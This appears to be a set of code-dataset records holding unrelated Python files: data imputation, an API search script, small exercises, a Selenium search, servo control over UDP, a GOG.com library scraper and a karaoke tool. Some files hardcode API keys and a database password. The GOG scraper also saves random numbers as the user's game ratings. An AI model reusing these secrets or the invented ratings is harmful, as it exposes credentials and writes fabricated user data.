reverse\n xticklabels=['normal', 'accumulation'], yticklabels=['normal', 'accumulation'])\nplt.title(f'{location}, {test_apt}, {test_house}, threshold={threshold}', fontsize=14)\nplt.xlabel('Predicted label')\nplt.ylabel('True label')\nplt.savefig(f'result/cm_{location}_{test_apt}_{test_house}.png')\nplt.show()\n\n\n##############################\n# 4. imputation\ndf['imp_const'] = df['injected'].copy()\ndf['imp_no-const'] = df['injected'].copy()\n\n# 4-1. normal imputation - idx_detected_nor\nfor idx in idx_detected_nor:\n # idx 있는 곳만 injection 남겨서 imputation\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=1, f_len_bwd=1)\n df['imp_const'][idx+1:idx+4] = fcst_bidirec1\n df['imp_no-const'][idx+1:idx+4] = fcst_bidirec1\n\n# 4-2. acc. imputation - idx_detected_acc\nfor idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n # data_inj_temp[idx:idx+4] = data_inj[idx:idx+4]\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = 2\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=1, f_len_bwd=1, n_len=4)\n acc = data_inj_temp[idx]\n fcst_bidirec1 = fcst_bidirec1*(acc/sum(fcst_bidirec1))\n df['imp_const'][idx:idx+4] = fcst_bidirec1\n\n# 4-2-2. acc. imputation - no constraints\nfor idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=1, f_len_bwd=1, n_len=3)\n df['imp_no-const'][idx+1:idx+4] = fcst_bidirec1\n\naccuracy_by_cases(df)","sub_path":"imputation.py","file_name":"imputation.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"314780538","text":"import requests\nimport pprint\n\nuser_in = raw_input(\"Please enter a search term: \")\n\nquery_params = { 'apikey': 'f6ab5f2e4f69444b9f2c0a44d9a5223d',\n 'per_page': 3,\n 'phrase': user_in,\n 'sort': \"date desc\"\n }\n\nendpoint = 'http://capitolwords.org/api/text.json'\n\n\n\nresponse = requests.get(endpoint, params=query_params)\ndata = response.json()\n\ndate = data['results'][0]['date']\nname = data['results'][0]['speaker_first'] + \" \" + data['results'][0]['speaker_last']\ncontext = data['results'][0]['speaking']\n\n\nprint(\"On %s, %s said: \\n\\n\\n\\\"%s\\\"\") % (date, name, context)\n\n\n\n\n\n# documentation: http://capitolwords.org/api/1/#text.json \n# API key: 7a9c67594721496695953e94f3c0191e","sub_path":"apis_restful/capitol_words/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210571574","text":"import sys\nimport math\n\ndef PrimeGenerator(l):\n\tlength=len(l)\n\tfor i in range(1,length,2):\n\t\tstrn=''\n\t\tN=l[i]\n\t\tif N==1:\n\t\t\tN=N+1\n\t\t\n\t\twhile N<=l[i+1]:\n\t\t\tflag=1\n\t\t\tj=2\n\t\t\twhile j<=math.sqrt(N):\n\t\t\t\t#not prime\n\t\t\t\tif N%j==0:\n\t\t\t\t\tflag=0\n\t\t\t\t\tpass\n\t\t\t\tj=j+1\n\t\t\tif flag==1:\n\t\t\t\t\t#if prime then add\n\t\t\t\t\tstrn+=str(N)+\" \"\n\t\t\t\t\n\t\t\tN=N+1\n\t\tprint(strn)\n\nstrm=''\nnum=sys.stdin.readlines()\nfor item in num:\n\tstrm+=item\nnumber=[int(x) for x in strm.split()]\nPrimeGenerator(number)\n","sub_path":"2.Python/Python Challenge/PrimeGenerator.py","file_name":"PrimeGenerator.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609061788","text":"from numpy.random import choice\n\nclass InvalidRating(Exception):\n def __init__(self):\n print(\"\\nInvalid House rating, cannot play Quidditch at this time.\\nPlease get assigned to a house and play again..\\n\")\n\ndef quidditch(rating, points, house):\n \"\"\"\n This function selects the winner of the first game of Quidditch game based on house rating of the wizard. \n And in the second game, this function gets inputs from the wizard for catching a snitch. \n\n House points are awarded or deducted from the house in each game. \n Function returns the updated house points.\n \n Arguments:\n rating - (int or float) - represents the house rating of the player.\n points - (int or float) - represents house cup points of the player's house.\n house - (str) - represents the house of the player.\n \"\"\" \n if rating < 0 or rating > 1:\n win_flag = 0\n raise InvalidRating\n else: \n plus_minus = 0\n win_flag = choice(a = [0,1], size = 1, p = [(1-rating), rating])\n if win_flag == 1:\n plus_minus += 10\n print('\\nCongratulations !!!')\n print(f\"The chasers for your house ({house}) scored the quaffle by throwing it through the hoops past the opponents keeper.\")\n print('You scored 10 house points!')\n print(f'{house} house now has a total of {points + plus_minus} house cup points.')\n else:\n plus_minus -= 10\n print(f\"\\nSorry, your house ({house}) beater performed an illegal illegally hit th opponents seeker with their club. The referee deducts 10 points from your team.\")\n print(f'{house} house now has a total of {points + plus_minus} house cup points.')\n print('\\nDo you want to catch the snitch, which ends the game and awards you 150 bonus house points?')\n user_input = input(\"Enter y to catch the snitch, or enter any other character if not interested: \") \n if user_input.lower() == 'y': \n print(' ')\n print('There are five doors (1,2,3,4,5) and a snitch is in one of them. Guess where is the snitch, you can only check 2 doors.')\n print(' ')\n counter = 0\n while counter < 2:\n try:\n door = int(input('Enter the door number :'))\n counter += 1\n if door in [1,3,5]:\n plus_minus += 150\n print(f\"\\nCongratulations! You caught the snitch. The game is over and you get 150 bonus points! {house} house now has a total of {points + plus_minus} points.\")\n break\n else:\n if counter < 2:\n print('\\nSnitch is not here, try another door. You have one more chance\\n')\n else:\n print(f\"\\nSorry, the Snitch escaped and your opponent's seeker caught it. The game is over and you receive no bonus points.\\n\")\n continue\n except ValueError:\n print('\\nYou must enter a valid integer 1,2,3,4,5. Please try again.\\n')\n continue\n return (points + plus_minus)\n else:\n print('\\nYour opponent house seeker caught the snitch and the game is over.\\n')\n return (points + plus_minus)\n","sub_path":"potterworld/sub2/quidditch.py","file_name":"quidditch.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"300831166","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport requests as req\nfrom selenium.webdriver.chrome.options import Options \n\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\")\ndriver = webdriver.Chrome(chrome_options=chrome_options)\ndriver.get(\"http://www.google.com\")\nsearch = \"deep learning with python\"\ntext = search + \" filetype:pdf\"\nsearch_element = driver.find_element_by_name(\"q\")\nsearch_element.send_keys(text,Keys.ENTER)\n# print(driver.current_url)\nres_element = driver.find_elements_by_tag_name(\"a\")\n# res_element.click()\n# print(res_element)\n\nfor data in res_element:\n link = data.get_attribute(\"href\")\n len_link = len(str(link))\n if(str(link).find(\".pdf\")==len_link-4):\n # print(str(link).find(\".pdf\"))\n print(link)\n # break\n # else:\n # print(\"no pdf\")\n\n\n # print (data.get_attribute(\"href\").find())\n\n\n# results = req.get(driver.current_url)\n# source_code = results.text\n\n\n\n","sub_path":"sel.py","file_name":"sel.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"570462415","text":"import socket\nimport sys\nfrom adafruit_servokit import ServoKit\nimport time\n\nkit = ServoKit(channels=16)\n\n#UDP communication\nUDP_IP = '127.0.0.1'\nUDP_PORT = 5556\nBUFFER_SIZE = 20 \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ns.bind((UDP_IP,UDP_PORT))\n\nwhile True:\n data, addr = s.recvfrom(1024)\n data = data.decode()\n data = data.split('\\n')[0].split(',')\n\n if(len(data) == 3):\n\n print(data[0])\n print(data[1])\n print(data[2])\n\n servo1 = float(data[0])\n servo2 = float(data[1])\n servo3 = float(data[2])\n\n kit.servo[0].angle = servo1\n kit.servo[1].angle = servo2\n kit.servo[2].angle = servo3\n","sub_path":"ServoCom.py","file_name":"ServoCom.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524039530","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\n\n\n__version__ = '0.1.0'\n\n\ndependencies = {}\nfor env in ('prod', 'dev'):\n requires = []\n with open('requirements/{}.txt'.format(env), encoding='utf-8') as f:\n for line in f:\n if not (line.startswith('#') or line.startswith('-r')):\n requires.append(line)\n dependencies[env] = requires\n\n\nsetup(\n name='pmps',\n version=__version__,\n packages=find_packages(),\n install_requires=dependencies['prod'],\n tests_require=dependencies['dev'],\n extras_require={\n 'dev': dependencies['dev'],\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121696778","text":"\"\"\"perfect_square\"\"\"\ndef main():\n \"\"\"your code here\"\"\"\n square = int(input())\n epsilon = 0.01\n guess = 0.0\n i = 0.0001\n num_of_guess = 0\n while abs(guess**2 - square) >= epsilon:\n guess += i\n num_of_guess += 1\n print('num_of_guess =', num_of_guess)\n if abs(guess**2 - square) >= epsilon:\n print('Failed')\n else:\n print(guess, 'is close to the square root of', square)\nif __name__ == \"__main__\":\n main()","sub_path":"M5/p2/p2/square_root.py","file_name":"square_root.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98975186","text":"#The circulant (wrap-around) nature of the dft can sometimes be\n#problematic. Write a routine to take the convolution of two arrays\n#*without* any danger of wrapping around. You may wish to add zeros\n#to the end of the input arrays. \n\n\nfrom numpy.fft import fft,ifft\nimport numpy\nfrom matplotlib import pyplot as plt\n\ndef conv_nowrap(x,y):\n assert(x.size==y.size) #if the vectors are different sizes, get grumpy\n #now we need to make double length arrays padded with zeros at the end\n #this way a value at the end of the first array convolved with a value at\n #the end of the second array will end up at the end of the padded array\n xx=numpy.zeros(2*x.size)\n xx[0:x.size]=x\n\n yy=numpy.zeros(2*y.size)\n yy[0:y.size]=y\n xxft=fft(xx)\n yyft=fft(yy)\n vec=numpy.real(ifft(xxft*yyft))\n return vec[0:x.size]\n\nif __name__=='__main__':\n x=numpy.arange(-20,20,0.1)\n sigma=2\n y=numpy.exp(-0.5*x**2/sigma**2)\n y=y/y.sum()\n\n yconv=conv_nowrap(y,y)\n plt.plot(x,y)\n plt.plot(x,yconv)\n plt.show()\n\n \n","sub_path":"tut4.py","file_name":"tut4.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"535738486","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\n# imports\nimport sys\nimport logging\nimport contextlib\nimport json\nimport html5lib\nimport time\nimport getpass\nimport argparse\nimport codecs\nimport datetime\nimport socket\nimport http.cookiejar as cookiejar\nfrom http.client import BadStatusLine\nfrom urllib.parse import urlencode\nfrom urllib.request import HTTPCookieProcessor, HTTPError, URLError, build_opener, Request\nimport psycopg2\nimport requests\nfrom bs4 import BeautifulSoup\nfrom random import randint\n\n\n# благодарим за возможность подключить GOG вот эту программу для скачивания игр\n# https://github.com/eddie3/gogrepo\n\n\n# заглушка\ntry:\n from html2text import html2text\nexcept ImportError:\n def html2text(x):\n return x\n\n# библа для обхода проверки куки\ncookiejar.MozillaCookieJar.magic_re = r'.*'\n\n# логгирование\nlogFormatter = logging.Formatter(\"%(asctime)s | %(message)s\", datefmt='%H:%M:%S')\nrootLogger = logging.getLogger('ws')\nrootLogger.setLevel(logging.DEBUG)\nconsoleHandler = logging.StreamHandler(sys.stdout)\nconsoleHandler.setFormatter(logFormatter)\nrootLogger.addHandler(consoleHandler)\ninfo = rootLogger.info\nwarn = rootLogger.warning\ndebug = rootLogger.debug\nerror = rootLogger.error\nlog_exception = rootLogger.exception\n\n# для работы web части\nglobal_cookies = cookiejar.LWPCookieJar()\ncookieproc = HTTPCookieProcessor(global_cookies)\nopener = build_opener(cookieproc)\ntreebuilder = html5lib.treebuilders.getTreeBuilder('etree')\nparser = html5lib.HTMLParser(tree=treebuilder, namespaceHTMLElements=False)\n\n# GOG URLы\nGOG_HOME_URL = r'https://www.gog.com'\nGOG_ACCOUNT_URL = r'https://www.gog.com/account'\nGOG_LOGIN_URL = r'https://login.gog.com/login_check'\nGOG_API_URL = r'http://api.gog.com/products'\n\n# Константы\nGOG_MEDIA_TYPE_GAME = '1'\nGOG_MEDIA_TYPE_MOVIE = '2'\n\n# HTTP request settings\nHTTP_FETCH_DELAY = 1\nHTTP_RETRY_DELAY = 5\nHTTP_RETRY_COUNT = 3\nHTTP_PERM_ERRORCODES = (404, 403, 503)\n\n# These file types don't have md5 data from GOG\nSKIP_MD5_FILE_EXT = ['.txt', '.zip']\n\n\ndef request(url, args=None, byte_range=None, retries=HTTP_RETRY_COUNT, delay=HTTP_FETCH_DELAY):\n # web запросы с по��торами\n _retry = False\n time.sleep(delay)\n\n try:\n if args is not None:\n enc_args = urlencode(args)\n enc_args = enc_args.encode('ascii')\n else:\n enc_args = None\n req = Request(url, data=enc_args)\n if byte_range is not None:\n req.add_header('Range', 'bytes=%d-%d' % byte_range)\n page = opener.open(req)\n except (HTTPError, URLError, socket.error, BadStatusLine) as e:\n if isinstance(e, HTTPError):\n if e.code in HTTP_PERM_ERRORCODES:\n warn('ошибка запроса: %s.', e)\n raise\n if retries > 0:\n _retry = True\n else:\n raise\n\n if _retry:\n warn('ошибка запроса: %s (%d попыток осталось) -- рестарт через %ds...' % (e, retries, HTTP_RETRY_DELAY))\n return request(url=url, args=args, byte_range=byte_range, retries=retries - 1, delay=HTTP_RETRY_DELAY)\n\n return contextlib.closing(page)\n\n\n# --------------------------\n# Дополнительные типы и функции\n# --------------------------\n\nclass AttrDict(dict):\n def __init__(self, **kw):\n self.update(kw)\n\n def __getattr__(self, key):\n return self[key]\n\n def __setattr__(self, key, val):\n self[key] = val\n\n\ndef item_checkdb(search_id, gamesdb):\n for i in range(len(gamesdb)):\n if search_id == gamesdb[i].id:\n return i\n return None\n\n\ndef rename_genres(genre):\n genrestable = {'Приключение': 'Adventure',\n 'Стратегия': 'Strategy',\n 'Ролевая игра': 'RPG',\n 'Экшн': 'Action',\n 'Симулятор': 'Simulation',\n 'Шутер': 'Shooter',\n 'Инди': 'Indie',\n 'Гонки': 'Racing'}\n return genrestable[genre]\n\n\ndef process_argv(argv):\n p1 = argparse.ArgumentParser(description='%s' % ('Вход в сервис GOG'))\n p1.add_argument('user', action='store', help='Юзер', nargs='?', default=None)\n p1.add_argument('username', action='store', help='GOG login/email', nargs='?', default=None)\n p1.add_argument('password', action='store', help='GOG пароль', nargs='?', default=None)\n\n # парсит полученные аргументы, выкидывает ошибку по необходимости\n args = p1.parse_args(argv[1:])\n return args\n\n\n# --------\n# Команды\n# --------\n\ndef cmd_login(user, passwd):\n # Логинимся в GOG\n login_data = {'user': user,\n 'passwd': passwd,\n 'auth_url': None,\n 'login_token': None,\n 'two_step_url': None,\n 'two_step_token': None,\n 'two_step_security_code': None,\n 'login_success': False,\n }\n\n global_cookies.clear()\n\n # просим логин/пароль по необходимости\n if login_data['user'] is None:\n login_data['user'] = input(\"Логин: \")\n if login_data['passwd'] is None:\n login_data['passwd'] = getpass.getpass()\n\n info(\"попытка входа в систему как '{}' ...\".format(login_data['user']))\n\n # получаем url входа\n with request(GOG_HOME_URL, delay=0) as page:\n etree = html5lib.parse(page, namespaceHTMLElements=False)\n for elm in etree.findall('.//script'):\n if elm.text is not None and 'GalaxyAccounts' in elm.text:\n login_data['auth_url'] = elm.text.split(\"'\")[3]\n break\n\n # обрабатываем токен логина\n with request(login_data['auth_url'], delay=0) as page:\n etree = html5lib.parse(page, namespaceHTMLElements=False)\n # расстраиваемся, если получаем требование ввода капчи\n if len(etree.findall('.//div[@class=\"g-recaptcha form__recaptcha\"]')) > 0:\n error(\"невозможно продолжить, GOG требует ввод reCAPTCHA\")\n return\n for elm in etree.findall('.//input'):\n if elm.attrib['id'] == 'login__token':\n login_data['login_token'] = elm.attrib['value']\n break\n\n # пытаемся залогиниться и получаем запрос на двухэтапную авторизацию\n with request(GOG_LOGIN_URL, delay=0, args={'login[username]': login_data['user'],\n 'login[password]': login_data['passwd'],\n 'login[login]': '',\n 'login[_token]': login_data['login_token']}) as page:\n etree = html5lib.parse(page, namespaceHTMLElements=False)\n if 'two_step' in page.geturl():\n login_data['two_step_url'] = page.geturl()\n for elm in etree.findall('.//input'):\n if elm.attrib['id'] == 'second_step_authentication__token':\n login_data['two_step_token'] = elm.attrib['value']\n break\n elif 'on_login_success' in page.geturl():\n login_data['login_success'] = True\n\n # проводим двухэтапную\n if login_data['two_step_url'] is not None:\n login_data['two_step_security_code'] = input(\"введите код двухэтапной авторизации: \")\n\n # отправляем код обратно\n with request(login_data['two_step_url'], delay=0,\n args={'second_step_authentication[token][letter_1]': login_data['two_step_security_code'][0],\n 'second_step_authentication[token][letter_2]': login_data['two_step_security_code'][1],\n 'second_step_authentication[token][letter_3]': login_data['two_step_security_code'][2],\n 'second_step_authentication[token][letter_4]': login_data['two_step_security_code'][3],\n 'second_step_authentication[send]': \"\",\n 'second_step_authentication[_token]': login_data['two_step_token']}) as page:\n if 'on_login_success' in page.geturl():\n login_data['login_success'] = True\n\n # выводим результат\n if login_data['login_success']:\n info('вход выполнен')\n else:\n error('вход не выполнен, проверьте введённые данные')\n\n\ndef cmd_update(UserID):\n media_type = GOG_MEDIA_TYPE_GAME\n i = 0\n\n api_url = GOG_ACCOUNT_URL\n api_url += \"/getFilteredProducts\"\n\n # получаем данные игр\n done1 = False\n done2 = False\n info('подключение к базе')\n conn = psycopg2.connect(dbname='game_shelf', user='pacas', password='12345', host='127.0.0.1', port='5432', connect_timeout=5)\n cursor = conn.cursor()\n info('подключено')\n cursor.execute(\"SELECT id FROM users WHERE login = '\" + UserID + \"'\")\n UserID = cursor.fetchall()\n UserID = UserID[0][0]\n\n # метод для получения информации о имеющихся играх в базе\n cursor.callproc('get_all_platform_games', ['GOG.com'])\n gameid = cursor.fetchall()\n DBGames = set()\n if len(gameid) != 0:\n for j in gameid:\n DBGames.add(j[0])\n\n GOGList = set()\n while not done1:\n i += 1\n url = api_url + \"?\" + urlencode({'mediaType': media_type,\n 'sortBy': 'title',\n 'page': str(i)})\n\n with request(url, delay=0) as data_request:\n reader = codecs.getreader(\"utf-8\")\n try:\n json_data = json.load(reader(data_request))\n except ValueError:\n error('ошибка получения данных')\n cursor.close()\n conn.close()\n raise SystemExit(1)\n\n for item_json_data in json_data['products']:\n GOGList.add(str(item_json_data['id']))\n\n if i >= json_data['totalPages']:\n done1 = True\n\n diff = GOGList.difference(DBGames)\n info('начинаем синхронизацию')\n i = 0\n while not done2:\n i += 1\n info('получение данных')\n\n url = api_url + \"?\" + urlencode({'mediaType': media_type,\n 'sortBy': 'title',\n 'page': str(i)})\n\n with request(url, delay=0) as data_request:\n reader = codecs.getreader(\"utf-8\")\n try:\n json_data = json.load(reader(data_request))\n except ValueError:\n error('ошибка получения данных')\n cursor.close()\n conn.close()\n raise SystemExit(1)\n\n # парсим интересующие поля в словарь\n for item_json_data in json_data['products']:\n ID = item_json_data['id']\n if str(ID) in diff:\n long_title = item_json_data['title']\n genre = item_json_data['category']\n store_url = item_json_data['url']\n\n if '/game/' in store_url:\n check = 1\n store_url = GOG_HOME_URL + store_url\n response = requests.get(store_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n full_list = soup.find_all(class_='details__content table__row-content')\n found = ''\n found += str(full_list[3])\n found += str(full_list[2])\n c = [r for r in range(len(found)) if found.startswith('href=\"/games?devpub=', r)]\n a = found.find(\"eventLabel: 'Developer: \")\n b = found.find(\"eventLabel: 'Publisher: \")\n dev = str(found[a + 24:c[0] - 4])\n pub = str(found[b + 24:c[1] - 4])\n\n # проверяем существование разрабов, иначе создаём\n cursor.execute(\"SELECT EXISTS(SELECT name FROM companies WHERE name = '\" + dev + \"')\")\n records = cursor.fetchall()\n if str(records[0][0]) == 'False':\n cursor.callproc('insert_company', [dev, None])\n\n # проверяем существование издателей, иначе создаём\n cursor.execute(\"SELECT EXISTS(SELECT name FROM companies WHERE name = '\" + pub + \"')\")\n records = cursor.fetchall()\n if str(records[0][0]) == 'False':\n cursor.callproc('insert_company', [pub, None])\n else:\n check = 0\n\n # проверяем существование жанра, иначе создаём\n if genre != '':\n genre = rename_genres(genre)\n cursor.execute(\"SELECT EXISTS(SELECT name FROM genres WHERE name = '\" + genre + \"')\")\n records = cursor.fetchall()\n if str(records[0][0]) == 'False':\n cursor.callproc('insert_genre', [genre, None])\n\n addapi_url = GOG_API_URL\n addapi_url += \"/\" + str(ID) + \"?expand=expanded_dlcs,description,screenshots,videos\"\n try:\n with request(addapi_url) as data_request:\n reader = codecs.getreader(\"utf-8\")\n item_json_data_additional = json.load(reader(data_request))\n\n image = item_json_data_additional['images']\n image = image['logo2x']\n image.replace('\\/', '/')\n image = image[2:]\n release_date = item_json_data_additional['release_date']\n description = item_json_data_additional['description']\n description = description['lead']\n\n except Exception:\n log_exception('error')\n\n # добавляем игру\n info('добавляем игру %s' % long_title)\n cursor.callproc('insert_game', ['GOG.com', str(ID), long_title, release_date, description, image])\n GameID = cursor.fetchall()\n GameID = GameID[0][0]\n\n # соединяем игру и жанр\n cursor.callproc('attach_game_genre', [GameID, genre])\n\n # соединяем игру и платформу\n cursor.callproc('attach_game_platform', [GameID, 'GOG.com', str(ID), store_url])\n\n if check == 1:\n # соединяем игру и разрабов\n cursor.callproc('attach_game_developer', [GameID, dev])\n\n # соединяем игру и издателей\n cursor.callproc('attach_game_publisher', [GameID, pub])\n else:\n cursor.callproc('attach_game_developer', [GameID, ''])\n cursor.callproc('attach_game_publisher', [GameID, ''])\n\n cursor.callproc('attach_user_game', [UserID, GameID, 'GOG.com', 0])\n\n # добавляем рейтинг\n rate = randint(0, 10)\n cursor.callproc('insert_or_update_rate', [UserID, GameID, rate, None])\n\n cursor.execute(\"COMMIT;\")\n\n if i >= json_data['totalPages']:\n done2 = True\n\n # закрываем соединение\n cursor.close()\n conn.close()\n\n '''\n Полезные ссылки:\n embed.gog.com/userData.json - инфа с id пользователя\n embed.gog.com/users/info/48628349971017?expand=friendStatus,wishlistStatus,blockedStatus\n '''\n\n\ndef main(args):\n stime = datetime.datetime.now()\n cmd_login(args.username, args.password)\n cmd_update(args.user)\n etime = datetime.datetime.now()\n info('--')\n info('общее время: %s' % (etime - stime))\n\n\nif __name__ == \"__main__\":\n try:\n main(process_argv(sys.argv))\n info('выход...')\n except KeyboardInterrupt:\n info('выход...')\n sys.exit(1)\n except SystemExit:\n raise\n except:\n log_exception('ошибка...')\n sys.exit(1)\n","sub_path":"gog_api_module.py","file_name":"gog_api_module.py","file_ext":"py","file_size_in_byte":17392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"411334677","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_http_methods\n\nfrom authentication import authenticator\nfrom machine import machine_controller\nfrom server.utils import HandleError\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef GetAllMachineInfo(request):\n return JsonResponse({'machines': machine_controller.GetAllMachineInfo()})\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef AddMachine(request):\n reqJson = json.loads(request.body)\n return JsonResponse({\n 'result': machine_controller.AddMachine(\n reqJson['name'], reqJson['user'], reqJson['host'], reqJson['auth_key']),\n })\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef UpdateMachine(request):\n reqJson = json.loads(request.body)\n return JsonResponse({\n 'result': machine_controller.UpdateMachine(\n reqJson['name'], reqJson['user'], reqJson['host'], reqJson['auth_key']),\n })\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef DeleteMachine(request):\n reqJson = json.loads(request.body)\n machine_controller.DeleteMachine(reqJson['name'])\n return JsonResponse({'result': 'DONE'})\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef SessionListMachines(request):\n return JsonResponse({'result': machine_controller.ListMachines()})\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef SessionPathStat(request):\n reqJson = json.loads(request.body)\n session_name = reqJson['session_name']\n machine_name = reqJson.get('machine_name', None)\n path = reqJson.get('path', None)\n controller = machine_controller.SessionController(session_name)\n return JsonResponse(controller.PathStat(machine_name, path))\n","sub_path":"machine/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"328553833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2015, Fabrice Laporte\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\nfrom __future__ import (division, absolute_import, print_function,\n unicode_literals)\n\nimport logging\nimport os\nimport sys\nimport time\nimport re\n\nfrom blessed import Terminal\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom datetime import timedelta\n\nfrom keroaek import vlc\n\nLOG_FILENAME = 'keroaek.log'\nlogging.getLogger('').handlers = []\nlogging.basicConfig(filename=LOG_FILENAME, filemode='a', level=logging.DEBUG)\n\nlogger = logging.getLogger(__name__)\n\nLine = namedtuple('Line', 'words consumed text timings')\nterm = Terminal()\nSHIFT_DELAY_MS = 1500\n\n\n@contextmanager\ndef stderr_redirected(to=os.devnull):\n '''\n import os\n\n with stderr_redirected(to=filename):\n print(\"from Python\")\n os.system(\"echo non-Python applications are also supported\")\n '''\n fd = sys.stderr.fileno()\n\n def _redirect_stderr(to):\n sys.stderr.close() # + implicit flush()\n os.dup2(to.fileno(), fd) # fd writes to 'to' file\n sys.stderr = os.fdopen(fd, 'w') # Python writes to fd\n\n with os.fdopen(os.dup(fd), 'w') as old_stderr:\n with open(to, 'w') as file:\n _redirect_stderr(to=file)\n try:\n yield # allow code to be run with the redirected stderr\n finally:\n _redirect_stderr(to=old_stderr)\n\n\nTIMESTAMP_RE = r'(\\[\\d\\d:\\d\\d\\.\\d\\d\\])'\n\n\ndef convert_to_ms(text):\n \"\"\"Convert a text expressed as mm:ss.xx to milliseconds\n \"\"\"\n if text:\n mm, ss_xx = text.split(':')\n ss, xx = ss_xx.split('.')\n return timedelta(minutes=int(mm), seconds=int(ss),\n milliseconds=int(xx) * 10).total_seconds() * 1000\n\n\ndef parse_lrc(text):\n \"\"\"Return a tuple (timestamps, texts), each text starting at timestamp with\n same index.\n \"\"\"\n tokens = re.split(TIMESTAMP_RE, text)\n if len(tokens) == 1:\n return [None], tokens[0].split(' ')\n tokens = tokens[1:]\n return [x[1:-1] for x in tokens[0::2]], [x.strip() for x in tokens[1::2]]\n\n\ndef no_markup(text):\n \"\"\"Clean up text to remove timestamp markups\n \"\"\"\n return ' '.join(parse_lrc(text)[1])\n\n\nclass TopPanel():\n def __init__(self):\n title = 'keroaek'\n print(term.reverse(title + ' ' * (term.width - len(title))), end='')\n\n\nclass VersePanel():\n def __init__(self, text, verse_id=-1):\n \"\"\"Store verses internally by splitting input text at '\\n\\n'\n \"\"\"\n self.verses = []\n for (i, verse) in enumerate(text.split(u'\\n\\n')):\n self.verses.append(dict(lines=[x for x in verse.split(u'\\n')\n if x.strip()], key=i))\n self.verse_id = verse_id\n # self.select(verse_id)\n\n def next(self):\n if self.verse_id + 1 < len(self.verses):\n return self.verses[self.verse_id + 1]\n return self.verses[0]\n\n def select(self, verse_id=-1):\n if len(self.verses) == 1:\n return self.verses[self.verse_id]\n if verse_id == -1:\n self.verse_id += 1\n else:\n self.verse_id = verse_id\n if self.verse_id >= len(self.verses):\n self.verse_id = 0\n key = 0\n entrylen = 20\n colwidth = entrylen + 5\n rows = int(len(self.verses) / (term.width / colwidth)) + 1\n print(term.move_x(0), end='')\n for y in range(rows):\n for x in range(0, term.width - colwidth, colwidth):\n if key == len(self.verses):\n break\n with term.location():\n entry = no_markup(self.verses[key]['lines'][0])[:entrylen]\n print(x * term.move_right(), end='')\n self.verses[key]['position'] = (x, y)\n if key == self.verse_id:\n print('%s %s' % (term.black_on_yellow(str(key + 1)),\n term.black_on_yellow(entry)), end='')\n 